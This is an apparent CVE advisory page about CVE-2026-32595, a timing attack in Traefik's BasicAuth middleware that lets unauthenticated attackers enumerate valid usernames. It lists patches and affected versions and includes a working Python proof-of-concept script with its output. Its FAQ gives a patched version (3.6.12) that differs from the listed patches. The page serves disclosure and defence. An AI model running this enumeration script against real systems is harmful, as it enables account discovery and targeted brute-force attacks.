CVE-2026-32595: Traefik: BasicAuth Middleware Timing Attack Allows Username Enumeration

Published Mar 20, 2026
·
Updated

## Summary There is a potential vulnerability in Traefik's BasicAuth middleware that allows username enumeration via a timing attack. When a submitted username exists, the middleware performs a bcrypt password comparison taking ~166ms. When the username does not exist, the response returns immediately in ~0.6ms. This ~298x timing difference is observable over the network and allows an unauthenticated attacker to reliably distinguish valid from invalid usernames. ## Patches - https://github.com/traefik/traefik/releases/tag/v2.11.41 - https://github.com/traefik/traefik/releases/tag/v3.6.11 - https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2 ## For more information If you have any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues). <details> <summary>Original Description</summary> ### Summary A timing attack vulnerability exists in Traefik's BasicAuth middleware that allows unauthenticated attackers to enumerate valid usernames. When a username exists, bcrypt password verification takes ~166ms; when it doesn't exist, the response returns immediately in ~0.6ms. This ~298x timing difference enables reliable username enumeration. ### Details The vulnerability exists in the BasicAuth middleware implementation. When validating credentials: - User exists: The system performs bcrypt password comparison, which intentionally takes ~100-200ms due to bcrypt's design - User doesn't exist: The system immediately returns authentication failure in ~0.6ms This timing difference is observable over the network and allows attackers to distinguish between valid and invalid usernames. Root Cause: The code returns early when the user is not found, without performing a dummy bcrypt comparison to maintain constant-time execution. Expected behavior: The system should perform a bcrypt comparison regardless of whether the user exists, to maintain consistent response times. ### PoC Environment: - Traefik v3.6.9 - k3s v1.34.5 Configuration: ```yaml apiVersion: traefik.io/v1alpha1 kind: Middleware metadata: name: basicauth namespace: traefik-poc spec: basicAuth: secret: basic-auth-secret --- apiVersion: networking.k8s.io/v1 kind: Ingress metadata: name: test-basicauth annotations: traefik.ingress.kubernetes.io/router.middlewares: traefik-poc-basicauth@kubernetescrd spec: ingressClassName: traefik rules: - http: paths: - path: /protected pathType: Prefix backend: service: name: whoami port: number: 80 ``` PoC Script: ```python #!/usr/bin/env python3 import requests import time import statistics import sys TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:30080/protected" TEST_USERS = ["admin", "root", "test", "nonexistent12345"] SAMPLES = 20 def measure_time(username, password="wrongpassword"): times = [] for _ in range(SAMPLES): start = time.perf_counter() requests.get(TARGET, auth=(username, password), timeout=5) elapsed = time.perf_counter() - start times.append(elapsed) return statistics.median(times) print(f"Target: {TARGET}") print(f"Samples per user: {SAMPLES}\n") for user in TEST_USERS: median = measure_time(user) if median > 0.05: # bcrypt threshold status = "[+] EXISTS (slow - bcrypt verification)" else: status = "[-] NOT FOUND (fast - immediate return)" print(f"{status}: {user:20s} | median={median:.4f}s") ``` Execution Results: ``` Target: http://10.10.10.7:30080/protected Samples per user: 20 [+] EXISTS (slow - bcrypt verification): admin | median=0.1665s [-] NOT FOUND (fast - immediate return): root | median=0.0006s [-] NOT FOUND (fast - immediate return): test | median=0.0006s [-] NOT FOUND (fast - immediate return): nonexistent | median=0.0006s Timing difference ratio: 298.0x ``` ### Impact - **Vulnerability Type:** Information Disclosure via Timing Attack (CWE-208) - **Impact:** - Attackers can enumerate valid usernames without authentication - Enables targeted password brute-force attacks against confirmed accounts - Exposes information about system user structure - **Who is impacted:** All users of Traefik's BasicAuth middleware are affected. The vulnerability requires: - BasicAuth middleware enabled - Attacker able to make requests to protected endpoints - Network access to measure response times - **Attack Complexity:** Low - only requires sending HTTP requests and measuring response times - **Privileges Required:** None - **User Interaction:** None </details> ---

Affected Software

8 affected componentsFixes available
Traefik Labs Traefik<=2.11.40, >=3.0.0-beta1<=3.6.11, =3.7.0-ea.1
go/github.com/traefik/traefik/v3>=3.7.0-ea.1<3.7.0-ea.2
3.7.0-ea.2
go/github.com/traefik/traefik/v3<=3.6.10
3.6.11
go/github.com/traefik/traefik/v2<=2.11.40
2.11.41
go/github.com/traefik/traefik<=1.7.34
Traefik traefik<2.11.41
Traefik traefik>=3.0.0<=3.6.11
Traefik traefik=3.7.0-ea1

Event History

Mar 20, 2026
CVE Published
via MITRE·10:08 AM
Data Sourced
via MITRE·10:08 AM
DescriptionWeakness
Data Sourced
via NVD·11:18 AM
RemedyDescriptionSeverityWeaknessAffected Software
Advisory Published
via GitHub·03:43 PM
Data Sourced
via GitHub·03:43 PM
DescriptionWeaknessAffected Software
Free Weekly Intel

Don't miss critical vulnerabilities

Join thousands of security professionals who receive our weekly digest of trending CVEs, zero-days, and exploited vulnerabilities.

No spam. Unsubscribe anytime.

Frequently Asked Questions

1

What is the severity of CVE-2026-32595?

CVE-2026-32595 has been classified as a medium severity vulnerability due to its potential for enabling username enumeration.

2

How do I fix CVE-2026-32595?

To mitigate CVE-2026-32595, upgrade Traefik to version 2.11.41 or later, or 3.6.12 or later.

3

Which versions of Traefik are affected by CVE-2026-32595?

Traefik versions 2.11.40 and below, and versions 3.0.0-beta1 through 3.6.11 and 3.7.0-ea.1 are affected by CVE-2026-32595.

4

What type of attack does CVE-2026-32595 facilitate?

CVE-2026-32595 facilitates a timing attack that allows attackers to enumerate valid usernames.

5

Is CVE-2026-32595 specific to any middleware?

Yes, CVE-2026-32595 specifically affects the BasicAuth middleware in Traefik.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203